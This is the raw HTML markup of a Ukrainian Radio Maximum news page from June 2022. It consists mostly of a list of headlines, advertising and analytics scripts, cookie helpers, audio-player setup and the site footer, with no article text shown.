<a data-url="/polozhinskij-zapisav-pisnyu-pro-volonteriv-pryamo-na-fronti---video_n204709" title="" class="ajaxLink" target="_self" href="/polozhinskij-zapisav-pisnyu-pro-volonteriv-pryamo-na-fronti---video_n204709">
<div class="time">11:27</div>
<div class="news-title">
Положинський записав пісню про волонтерів прямо на фронті – відео
</div>
</a>
</li>
<li class="month">
18 червня
</li>
<li data-published-date="2022-06-18 20:54:00" class=" photo   ">
<a data-url="/vid-16-lipnya-vsi-sajti-povinni-butiukrayinskoyumovoyu_n204708" title="" class="ajaxLink" target="_self" href="/vid-16-lipnya-vsi-sajti-povinni-butiukrayinskoyumovoyu_n204708">
<div class="time">20:54</div>
<div class="news-title">
Від 16 липня всі сайти повинні бути українською мовою
</div>
</a>
</li>
<li data-published-date="2022-06-18 17:22:00" class=" photo   ">
<a data-url="/manga-pro-privida-kiyeva-yaka-zyavilasya-v-yaponiyi-bude-jukrayinskoyu_n204703" title="" class="ajaxLink" target="_self" href="/manga-pro-privida-kiyeva-yaka-zyavilasya-v-yaponiyi-bude-jukrayinskoyu_n204703">
<div class="time">17:22</div>
<div class="news-title">
Манґа про Привида Києва, яка з&#039;явилася в Японії, буде й українською
</div>
</a>
</li>

<li data-published-date="2022-06-18 14:22:00" class="   ">
<a data-url="/yaki-produkti-najbilshe-podorozhchali-za-minulij-misyac-dani-statistiki_n204691" title="" class="ajaxLink" target="_self" href="/yaki-produkti-najbilshe-podorozhchali-za-minulij-misyac-dani-statistiki_n204691">
<div class="time">14:22</div>
<div class="news-title">
Які продукти найбільше подорожчали за минулий місяць: дані статистики
</div>
</a>
</li>
<li data-published-date="2022-06-18 11:53:00" class="   ">
<a data-url="/u-chernivcyah-prodali-vishivanki-banderi-koshti-spryamuyut-na-pokupku-bronezhiletiv-dlya-zsu_n204690" title="" class="ajaxLink" target="_self" href="/u-chernivcyah-prodali-vishivanki-banderi-koshti-spryamuyut-na-pokupku-bronezhiletiv-dlya-zsu_n204690">
<div class="time">11:53</div>
<div class="news-title">
У Чернівцях продали вишиванки Бандери: кошти спрямують на покупку бронежилетів для ЗСУ
</div>
</a>
</li>
<li data-published-date="2022-06-18 09:20:00" class=" video   ">
<a data-url="/ukrayinci-stvorili-prototip-idealnogo-elektromobilya-dlya-sela_n204685" title="" class="ajaxLink" target="_self" href="/ukrayinci-stvorili-prototip-idealnogo-elektromobilya-dlya-sela_n204685">
<div class="time">09:20</div>
<div class="news-title">
Українці створили прототип ідеального електромобіля для села
</div>
</a>
</li>

<li data-published-date="2022-06-18 08:49:00" class="  ">
<a data-url="/yak-ne-ugrobiti-mashinu-na-rozbitij-dorozi-sekreti-j-nyuansi-yizdi-yamami_n195001" title="" class="ajaxLink" target="_self" href="/yak-ne-ugrobiti-mashinu-na-rozbitij-dorozi-sekreti-j-nyuansi-yizdi-yamami_n195001">
<div class="time">08:49</div>
<div class="news-title">
Як не угробити машину на розбитій дорозі: секрети й нюанси їзди ямами
</div>
</a>
</li>
<li class="month">
17 червня
</li>
<li data-published-date="2022-06-17 19:53:00" class=" photo   ">
<a data-url="/rejting-tehnologichnih-navichok-krayin-svitu-ukrayina-na-8-misci_n204684" title="" class="ajaxLink" target="_self" href="/rejting-tehnologichnih-navichok-krayin-svitu-ukrayina-na-8-misci_n204684">
<div class="time">19:53</div>
<div class="news-title">
Рейтинг технологічних навичок країн світу: Україна на 8 місці
</div>
</a>
</li>
<li data-published-date="2022-06-17 16:50:00" class="   ">
<a data-url="/ukrayina-zaprovadzhuye-vizovij-rezhim-z-rosiyeyu-vid-1-lipnya_n204678" title="" class="ajaxLink" target="_self" href="/ukrayina-zaprovadzhuye-vizovij-rezhim-z-rosiyeyu-vid-1-lipnya_n204678">
<div class="time">16:50</div>
<div class="news-title">
Україна запроваджує візовий режим з росією від 1 липня
</div>
</a>
</li>

<li data-published-date="2022-06-17 13:23:00" class=" video   ">
<a data-url="/alyona-alyona-ta-jerry-heil-vipustili-novij-bolyuchij-trek-chomu_n204675" title="" class="ajaxLink" target="_self" href="/alyona-alyona-ta-jerry-heil-vipustili-novij-bolyuchij-trek-chomu_n204675">
<div class="time">13:23</div>
<div class="news-title">
Alyona Alyona та Jerry Heil випустили новий болючий трек &quot;Чому&quot;
</div>
</a>
</li>
<li data-published-date="2022-06-17 10:49:00" class="   ">
<a data-url="/de-znajti-robotu-pid-chas-vijni-korisni-servisi-dlya-ukrayinciv_n202955" title="" class="ajaxLink" target="_self" href="/de-znajti-robotu-pid-chas-vijni-korisni-servisi-dlya-ukrayinciv_n202955">
<div class="time">10:49</div>
<div class="news-title">
Де знайти роботу під час війни: корисні сервіси для українців
</div>
</a>
</li>
<li class="month">
16 червня
</li>
<li data-published-date="2022-06-16 19:29:00" class=" video   ">
<a data-url="/prosto-smachno-j-aromatno-shche-odna-ideya-yak-prigotuvati-molodu-kartoplyu_n204665" title="" class="ajaxLink" target="_self" href="/prosto-smachno-j-aromatno-shche-odna-ideya-yak-prigotuvati-molodu-kartoplyu_n204665">
<div class="time">19:29</div>
<div class="news-title">
Просто, смачно й ароматно: ще одна ідея, як приготувати молоду картоплю
</div>
</a>
</li>

<li data-published-date="2022-06-16 17:19:00" class=" photo   ">
<a data-url="/svizhij-rejting-najdorozhchih-brendiv-svitu-yak-zaraz-viglyadaye-spisok_n204663" title="" class="ajaxLink" target="_self" href="/svizhij-rejting-najdorozhchih-brendiv-svitu-yak-zaraz-viglyadaye-spisok_n204663">
<div class="time">17:19</div>
<div class="news-title">
Свіжий рейтинг найдорожчих брендів світу: як зараз виглядає список
</div>
</a>
</li>
<li data-published-date="2022-06-16 11:23:00" class="   ">
<a data-url="/chi-zafiksovano-spalah-holeri-v-ukrayini-vidpovid-moz_n204651" title="" class="ajaxLink" target="_self" href="/chi-zafiksovano-spalah-holeri-v-ukrayini-vidpovid-moz_n204651">
<div class="time">11:23</div>
<div class="news-title">
Чи зафіксовано спалах холери в Україні: відповідь МОЗ
</div>
</a>
</li>
<li data-published-date="2022-06-16 08:22:00" class="   ">
<a data-url="/10-zvichnih-sliv-yaki-naspravdi-ne-ye-ukrayinskimi_n174079" title="" class="ajaxLink" target="_self" href="/10-zvichnih-sliv-yaki-naspravdi-ne-ye-ukrayinskimi_n174079">
<div class="time">08:22</div>
<div class="news-title">
10 звичних слів, які насправді не є українськими
</div>
</a>
</li>
<li class="month">
15 червня
</li>

<li data-published-date="2022-06-15 19:22:00" class="   ">
<a data-url="/ukrayina-otrimala-znachno-menshe-podatkiv-vid-turizmu-cherez-vijnu-na-skilki-zminilas-cifra_n204646" title="" class="ajaxLink" target="_self" href="/ukrayina-otrimala-znachno-menshe-podatkiv-vid-turizmu-cherez-vijnu-na-skilki-zminilas-cifra_n204646">
<div class="time">19:22</div>
<div class="news-title">
Україна отримала значно менше податків від туризму через війну: на скільки змінилась цифра
</div>
</a>
</li>
<li data-published-date="2022-06-15 16:49:00" class="   ">
<a data-url="/vid-mobilizaciyi-zvilnili-shche-odnu-kategoriyu-cholovikiv-pro-kogo-jdetsya_n204641" title="" class="ajaxLink" target="_self" href="/vid-mobilizaciyi-zvilnili-shche-odnu-kategoriyu-cholovikiv-pro-kogo-jdetsya_n204641">
<div class="time">16:49</div>
<div class="news-title">
Від мобілізації звільнили ще одну категорію чоловіків: про кого йдеться
</div>
</a>
</li>
<li data-published-date="2022-06-15 13:24:00" class="   ">
<a data-url="/u-mincifri-rozpovili-yak-vidrizniti-spravzhnij-chatbot-vid-fejkovogo_n204635" title="" class="ajaxLink" target="_self" href="/u-mincifri-rozpovili-yak-vidrizniti-spravzhnij-chatbot-vid-fejkovogo_n204635">
<div class="time">13:24</div>
<div class="news-title">
У Мінцифрі розповіли, як відрізнити справжній чатбот від фейкового
</div>
</a>
</li>

<li data-published-date="2022-06-15 10:21:00" class="  last ">
<a data-url="/v-ukrayini-nadzvichajnij-rivenpozhezhnoyi-nebezpeki-15-17-chervnya-dsns_n204628" title="" class="ajaxLink" target="_self" href="/v-ukrayini-nadzvichajnij-rivenpozhezhnoyi-nebezpeki-15-17-chervnya-dsns_n204628">
<div class="time">10:21</div>
<div class="news-title">
В Україні надзвичайний рівень пожежної небезпеки 15-17 червня – ДСНС
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news top">Більше новин
</button>
</div>
</div>
</div>
<div style="margin: 20px 0" id="recommended">
<script>
    const addPubAdsScript = () => {
        var parentEl = document.getElementsByTagName('body');
        var pubAdsScript = document.createElement('script');
        pubAdsScript.src = "https://securepubads.g.doubleclick.net/tag/js/gpt.js";
        pubAdsScript.async = true;
        parentEl[0].appendChild(pubAdsScript);
    };

    const listener = () => {
        if(window.scrollY > 200) {
            addPubAdsScript();
            window.removeEventListener('scroll', listener);
        }
    }
    window.addEventListener('scroll', listener);
</script>
<script>
    window.googletag = window.googletag || {cmd: []};
    googletag.cmd.push(function () {
        googletag.defineSlot('/56301415/maximum_right_column_more_news', [[1, 1], [300, 250], [300, 600]], 'div-gpt-ad-1640335916932-0').addService(googletag.pubads());
        googletag.pubads().enableSingleRequest();
        googletag.enableServices();
    });
</script>

<div id='div-gpt-ad-1640335916932-0' style='min-width: 300px; min-height: 250px; text-align: center'>
<script>
        googletag.cmd.push(function () {
            googletag.display('div-gpt-ad-1640335916932-0');
        });
    </script>
</div> </div>
</div>
</div>
</div>
<script>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</script>
<div id="mobile-branding">
<div id="mobile-branding-wrapper" style="height: 0">
<div id='div-gpt-ad-1479289268975-0'></div>
</div>
</div>
<script>
    if (window.innerWidth < 640) {
        let headerQuerySelector = 'header';
        // if (document.getElementById('mobileBrandingPlace') === null) {
        //     let mobileBrandingWrapper = document.createElement('div');
        //     mobileBrandingWrapper.id = 'mobileBrandingPlace';
        //     mobileBrandingWrapper.style.zIndex = 9;
        //     document.querySelector(headerQuerySelector).after(mobileBrandingWrapper)
        // }
        window.mobileBrandingConfig = {
            mobileBrandingPlace: '#mobileBrandingPlace',
            headerHeight: 0,
            isHeaderSticky: true,
            headerQuerySelector: headerQuerySelector
        }
        var removeMobileBranding = function () {
            ['mobileBrandingSmall', 'mobileBrandingSmallBannerWrapper'].forEach(item => {
                let branding = document.getElementById(item);
                if (branding && countNews <= 2) {
                    branding.remove();
                }
            });
            const event = document.createEvent('Event');
            event.initEvent('disableSmallMobileBranding', true, true);
            window.dispatchEvent(event);
        }

        initMobileBranding();

        observer('.hide-mobile-adv', removeMobileBranding, 1, false);
    }
</script>
<script>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</script>
<script>
        var ntsVideoHtml = `<div class="nts-video-wrapper">
                                <div class="nts-video-label">Відео дня</div>
                                <div class="nts-video" id="MFM_VIDEO"></div>
                            </div>`;
        var readAlsoBlock = document.querySelector('.read-also').insertAdjacentHTML('afterend', ntsVideoHtml);

        window.notsyCmd = window.notsyCmd || [];
        window.notsyCmd.push(function() {
            window.notsyInit({
                pageVersionAutodetect: true
            });
        });
    </script>
<script>
                (function () {
    var node = document.createElement("p");
    node.setAttribute("id", "withinNewsTextBanner");
    node.innerHTML = "<div id='div-gpt-ad-1586862014522-0'></div><div id='div-gpt-ad-1586862041493-0'></div>";
    var summary = document.querySelector(".news-content");
    summary.insertBefore(node, summary.childNodes[Math.floor(summary.childNodes.length / 2)]);
    var slotId;
    var slotSize;
    var wrapperId;
    var height;

    if (window.innerWidth < 640) {
        slotId = '/56301415/maximum_mobile_300x250_in_news';
        slotSize = [300, 250];
        wrapperId = 'div-gpt-ad-1586862041493-0';
        height = 250;
    } else {
        slotId = '/56301415/maximum_600x300_in_news';
        slotSize = [600, 300];
        wrapperId = 'div-gpt-ad-1586862014522-0';
        height = 350;
    }
    adCore.defineDfpSlot({
        'name': slotId,
        'sizes': slotSize,
        'id': wrapperId,
        'targeting': [],
        'callback': function (e) {
            if(!e.isEmpty) {
                var wrapper = document.getElementById(wrapperId);
                var iFrame = wrapper.getElementsByTagName("iframe")[0];
                if (iFrame) {
                    iFrame.width = '100%';
                    iFrame.height = height;
                }
            }
        }
    });
    var wrapperNode = document.getElementById(wrapperId);
    if (window.innerWidth < 640) {
        googletag.cmd.push(function () {
            googletag.display(wrapperId);
        });
        wrapperNode.setAttribute('style', 'width: 100%; height: 250px;')
    } else {
        googletag.cmd.push(function () {
            googletag.display(wrapperId);
        });
        wrapperNode.setAttribute('style', 'width: 100%; height: 350px;')
    }
})();
    </script>
<script>
        
        $(function () {

                        
            getShareCount({
                'newsId': '204720',
                'sharingUrl': 'https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720',
                'whatIs': 'news'
            });

        });

    </script>
<script>
        $(function () {
            new ClipboardTextWatermark({
                selector: '.news-content-wrapper',
                prefixText: 'Новини',
                link: 'https://maximum.fm/novini_t2',
                textWatermark: '<br/>https://maximum.fm/novini_t2'
            });
        });

    </script>
<script>
        function initTwentyTwenty(){
            const images = $('.before-after-comparator').find('img');
            $(images).each(function (){
                this.onload = function (){
                    if (this.height > 0){
                        $(function () {
                            $(".before-after-comparator").each(function (){
                                if(!$(this).hasClass('twentytwenty-container')){
                                    $(this).twentytwenty();
                                }
                            })
                        });
                    }
                }
            })
        }
        // this only for reload page
        window.addEventListener('load', function (e) {
            $(".before-after-comparator").each(function (){
                if(!$(this).hasClass('twentytwenty-container')){
                    $(this).twentytwenty();
                }
            })
        })
        // tis work after ajax replace content
        initTwentyTwenty();
    </script>
<script>
        (function () {
            $('#ontheioViewTacking').attr('data-io-article-url', window.location.href);
        })();
    </script>
<script>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</script>
<script src="/assets/js/replaceViewsCount.js?v=49"></script>
<script>
        window.addEventListener('pageshow', function () {
            new replaceViewsCount.Init({
                newsId: '204720',
                parentClass: '.news-content-wrapper',
                elementClass: '.watchers',
                url: '/get-count-views'
            });
        });
    </script>

<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var onTheIoScript = document.createElement('script');
            onTheIoScript.src = "https://cdn.onthe.io/io.js/Hz0HedbhBSNo"
            parentEl[0].appendChild(onTheIoScript);
        }, 1800);
    </script>
<script>
            window._io_config = window._io_config || {};
            window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
            window._io_config["0.2.0"].push({
                page_url: window.location.href,
                page_url_canonical: "https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720",
                page_title: "Олена Зеленська знялася для британського The Guardian - Радіо Максимум",
                page_type: "article",
                page_language: "uk",
                article_authors: ["Назар Сорока"],
                article_categories: ["Зірки"],
                article_type: "Новини",
                article_word_count: "310",
                article_publication_date: "Sun, 19 Jun 2022 16:22:00 +0300"
            });
        </script>

<script src="/assets/js/news.js?v=49"></script>
<script>new news.lazyEmbeds();</script>
</div>
<div class="mobile-320-ad" id="radio24_320x50">
<div id="mobile-320-ad-close">close</div>
<div id='div-gpt-ad-1474010488480-0' style='min-width: 320px; min-height: 50px;'></div>
</div>
<script>
    $('#mobile-320-ad-close').click(function () {
        $('#radio24_320x50').hide();
    });
</script>
<script>
    if( typeof dfpAdSlots === 'undefined'){
        var dfpAdSlots = [];
    }

    lazyLoadScripts(function () {
        if(adCore.isLargerThan(1024)) {
            dfpAdSlots['brandingAdSlot'] = adCore.defineDfpSlot({
                'name': '/56301415/radio24_newBranding',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1465852635468-0',
                'targeting': [
                    ['pageType', adCore.getPageName()],
                                        ['newsId', '204720'],
                    ['tagId', 'Шоу-біз,Зірки,Олена Зеленська,Фото,Новини'],
                                    ],
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if (typeof Foundation != 'undefined') {
                        new Foundation.Equalizer($('#topNewsEqualiser'));
                    }
                    if (e.isEmpty) {
                        if (adCore.isLargerThan(1279)) {
                            $('body').addClass('branding');
                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_left',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534586171-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534586171-0'); });

                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_right',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534615722-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534615722-0'); });
                        }
                    } else {
                        dfpAdSlots['brandingAdSlot'] = e.slot;
                    }
                }
            });
        }
    }, 2000);
</script>
<div class="adv-container">
<div class="row">
<div id="branding_wrap" class="bending_wrap"></div>
</div>
</div>
<div id='div-gpt-ad-1465852635468-0'>
<script type='text/javascript'>
        lazyLoadScripts(function () {
            if (adCore.isLargerThan(1024)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465852635468-0'); });
            }
        }, 2500);
    </script>
</div>
<div class="adv-container">
<div id="branding-wrapp" class="branding-wrapp">
<div class="google-left-img">
<div id="google-left-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534586171-0'>
</div>
</div>
</div>
<div class="google-right-img">
<div id="google-right-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534615722-0'>
</div>
</div>
</div>
</div>
</div>

<script src="/assets/js/lazyLoad.js?v=49"></script>
<script>new lazyLoad.Init();</script>
<script src="/assets/js/application.js?v=49"></script>
<script>
    $('.play-btn').mousedown(function () {
        let playerBtn = $(this);
        if (false === playerBtn.hasClass('play-clicked')) {
            loadPlayer();
            playerBtn.addClass('play-clicked');
        }
    });

    function loadPlayer() {
        application.cssSrc('/assets/css/videojs/videojs.min.css?v=49');
        var player = window.player = videojs('audio-player');
        application.scriptSrc('/assets/js/player.min.js?v=49');
    }
</script>
<script>
    document.addEventListener("DOMContentLoaded", function (){
        const node = document.getElementById('news-list-wrapper');
        if(node){
            const isMainPage = parseInt(node.getAttribute('data-main'));
            if (isMainPage !== 1 ) {
                if (window.innerWidth > 640){
                    application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
                }
            } else {
                application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
            }
        }
    });
</script>
<footer>
<div class="footer-content">
<div class="row">
<div class="logo-wrapper columns small-12 medium-6">
<a href="/" class="main-logo ajaxLink" data-url="/"></a>
<div class="slogan">Від легендарних до сьогодні! МАКСИМУМ хітів на Радіо МАКСИМУМ</div>
<div class="copyrights">
При цитуванні і використанні будь-яких матеріалів в Інтернеті відкриті для пошукових систем
гіперпосилання не нижче першого абзацу на «Радіо Максимум» — обов’язкові.
Цитування і використання матеріалів у оффлайн-медіа, Мобільних додатках, SmartTV можливе лише з
письмової згоди «Радіо Максимум».
Матеріали з маркуванням «Реклама» публікуються на правах реклами.
Усі права захищені. © 2005—2022, ПрАТ «Телерадіокомпанія “Люкс”», «Радіо Максимум»
</div>
</div>
<div class=" columns small-12 medium-5">
<ul class="social">
<li class="social-button"><a href="//www.facebook.com/maximumfmua" class="facebook" target="_blank"></a></li>
<li class="social-button"><a href="//twitter.com/maximumfm_ua" class="twitter" target="_blank"></a></li>
<li class="social-button"><a href="/rssAll.xml" class="rss" target="_blank"></a></li>
<li class="social-button"><a href="//itunes.apple.com/ua/app/radio-24/id797596046?mt=8" class="appstore" target="_blank"></a></li>
<li class="social-button"><a href="//play.google.com/store/apps/details?id=com.radio24.ua" class="playmarket" target="_blank"></a></li>
</ul>
<ul class="links">
<li title="Архів">
<a class="ajaxLink" data-url="/archive" title="Архів" href="/archive">Архів</a>
</li>
<li>
<a href="/contacts#ownership-structure">Структура власності</a>
</li>
<li title="Контакти">
<a class="ajaxLink" data-url="/contacts" title="Контакти" href="/contacts">Контакти</a>
</li>
<li title="Політика користування сайтом">
<a class="ajaxLink" data-url="/rules" title="Політика користування сайтом" href="/rules">Політика користування сайтом</a>
</li>
<li title="Ведучі">
<a class="ajaxLink" data-url="/staff" title="Ведучі" href="/staff">Ведучі</a>
</li>
<li>
<a href="//maximum.fm/uploads/maximum.m3u">Завантажити для плеєра</a>
</li>
<li title="Карта покриття">
<a class="ajaxLink" data-url="/radiocovermap" title="Карта покриття" href="/radiocovermap">Карта покриття</a>
</li>
<li title="Політика конфіденційності">
<a class="ajaxLink" data-url="/copyrights" title="Політика конфіденційності" href="/copyrights">Політика конфіденційності</a>
</li>
</ul>
</div>
</div>
</div>
</footer>
<script>
    function desktopNewsCatfishInit() {
        if (adCore.isLargerThan(1023)) {
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_desktop_catfish',
                'sizes': [[1, 1], [970, 90]],
                'id': 'div-gpt-ad-1638533775236-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    var marketGrid = document.getElementById('market-grid');
                    if (!e.isEmpty) {
                        marketGrid.style.display = 'flex';

                        if (e.size[0] === 1 && e.size[1] === 1) {
                            let iFrame = marketGrid.getElementsByTagName("iframe")[0];
                            if (iFrame) {
                                iFrame.width = '990';
                                iFrame.height = '182';
                            }
                        }
                    } else {
                        marketGrid.style.display = 'none';
                    }
                }
            });
        }
    }

    desktopNewsCatfishInit();
</script>
<div id="market-grid" style="display: none;" class="market-grid">
<div id='div-gpt-ad-1638533775236-0' style='min-width: 970px; min-height: 90px;'>
<script>
            lazyLoadScripts(function () {
                if (adCore.isLargerThan(1023)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1638533775236-0');
                    });
                }
            }, 1500)
        </script>
</div>
<button class="close close-cat-fish"></button>
</div>
<script>
    $('.close-cat-fish').click(function () {
        $('#market-grid').remove();
    });
</script>
<div class="player-wrapper" style="overflow: hidden; opacity: 0 !important; height: 0; position: absolute; z-index: -1;">
<video id="audio-player" preload="auto" class="video-js vjs-default-skin" playsinline data-setup='{}' controls>
<source src="https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8" type="application/x-mpegURL" />
</video>
</div>
<script>
        lazyLoadScripts(function () {
            $(document).ready(function () {
                $('.expand-stations-wrapper').click(function () {
                    var stations = $('.stations-wrapper-header-block');

                    var isHidden = !stations.hasClass('full-view');
                    if (typeof getCookie("isStationsOpen") !== "undefined") {
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    } else {
                        deleteCookie("isStationsOpen");
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    }
                });
            });
        }, 2000);

        function deleteCookie(name) {
            setCookie(name, "", {
                expires: -1
            })
        }

        function getCookie(name) {
            var matches = document.cookie.match(new RegExp(
                "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
            ));
            return matches ? decodeURIComponent(matches[1]) : undefined;
        }

        function setCookie(name, value, options) {
            options = options || {};

            var expires = options.expires;

            if (typeof expires === "number" && expires) {
                var d = new Date();
                d.setTime(d.getTime() + expires * 1000);
                expires = options.expires = d;
            }
            if (expires && expires.toUTCString) {
                options.expires = expires.toUTCString();
            }

            value = encodeURIComponent(value);

            var updatedCookie = name + "=" + value;

            for (var propName in options) {
                updatedCookie += "; " + propName;
                var propValue = options[propName];
                if (propValue !== true) {
                    updatedCookie += "=" + propValue;
                }
            }

            document.cookie = updatedCookie;
        }
    </script>
<script>
        lazyLoadScripts(function () {
            (function () {
                if (typeof window.CustomEvent === "function") return false; //If not IE

                function CustomEvent(event, params) {
                    params = params || {bubbles: false, cancelable: false, detail: undefined};
                    var evt = document.createEvent('CustomEvent');
                    evt.initCustomEvent(event, params.bubbles, params.cancelable, params.detail);
                    return evt;
                }

                CustomEvent.prototype = window.Event.prototype;

                window.CustomEvent = CustomEvent;
            })();
        }, 2000);
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var libScript = document.createElement('script');
            libScript.src = "https://imasdk.googleapis.com/js/sdkloader/ima3.js"
            parentEl[0].appendChild(libScript);
        }, 1500);
    </script>
<script src="/assets/js/lib.min.js?v=49"></script>
<script src="/assets/js/news.js?v=49"></script>
<script>
        new news.getMoreNews({
            url: '/get-more-video-news',
            loadBtn: $('.load-more-news'),
        })
    </script>
<script src="/assets/js/app.min.js?v=49"></script>
<script>
    function getAllStream() {
                    var stream = {
                type: 'application/x-mpegURL',
                src: 'https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8'
            };
            streamConfig.addStream('onair', stream);
                streamConfig.onAirId = 4;
        streamConfig.onAirName = 'onair';
    }

    function getPrerollLink() {
        player.adTagLink = 'https\u003A\/\/inv\u002Dnets.admixer.net\/daast.aspx\u003Fzone\u003D1ba30f9d\u002Dfe35\u002D415f\u002Da6b5\u002D7077a40865ad\u0026rnd\u003D\u0025\u0025CACHEBUSTER\u0025\u0025\u0026page\u003D\u0025\u0025REFERRER_URL_ESC\u0025\u0025';
    }
</script>
<script src="/assets/js/websocket.js?v=49"></script>
<script>
        new websocket.Init({
            cdnHost: 'https://imagecdn3.luxnet.ua/music/web',
            wsHost: 'wss://maximum.fm/get-station-ws',
            headerSongLimit: 3,
            stationSongListLimit: 15
        });
    </script>
<script type="text/javascript">
        lazyLoadScripts(function () {
            $.smartbanner({
                title: ' ',
                author: 'Безкоштовно',
                inAppStore: 'Встановлюй на iOS', // Text of price for iOS
                inGooglePlay: 'Встановлюй на Android', // Text of price for Android
                price: ' ',
                button: 'Встановити'
            })
        }, 60000);
    </script>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Organization",
        "name": "Радіо Максимум",
        "foundingDate": "2017-10-03",
        "url": "https://maximum.fm/",
        "sameAs": [
            "https://maximum.fm/",
            "https://uk.wikipedia.org/wiki/%D0%A0%D0%B0%D0%B4%D1%96%D0%BE_%D0%9C%D0%B0%D0%BA%D1%81%D0%B8%D0%BC%D1%83%D0%BC",
            "https://www.facebook.com/maximumfmua",
            "https://twitter.com/maximumfm_ua",
            "https://apps.apple.com/ua/app/radio-24/id797596046",
            "https://play.google.com/store/apps/details?id=com.radio24.ua"
        ],
        "logo": {
            "@type": "ImageObject",
            "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png"
        },
        "address": {
            "@type": "PostalAddress",
            "streetAddress": "Київ, вул. Володимирська 61/11, офіс 44",
            "addressLocality": "Київ",
            "addressCountry": "UA"
        }
    }
</script> <script>
        //Commented. task https://jira.luxnet.ua/browse/MAXIMUM-1960
        // if(window.innerWidth > 640){
        //     $.ajax({
        //         type: "GET",
        //         url: "https://a4p.adpartner.pro/media?site_id=9&unit_id=242",
        //         dataType: "script"
        //     });
        // }
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://webvitals.luxnet.ua/js/bundle.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>

<div class="toTop">
<div id="toTop">
<img class="toTop-img" src="/assets/images/to_top.png?v=49" style="width: 50px; height: 50px" alt="To top icon">
</div>
</div>
<script>
    $(function() {
        $(window).scroll(function() {
            if($(this).scrollTop() != 0) {
                $('#toTop').fadeIn();
            } else {
                $('#toTop').fadeOut();
            }
        });

        $('#toTop').click(function() {
            $('body,html').animate({scrollTop:0},300);
        });
    });
</script> 
</body>
</html>
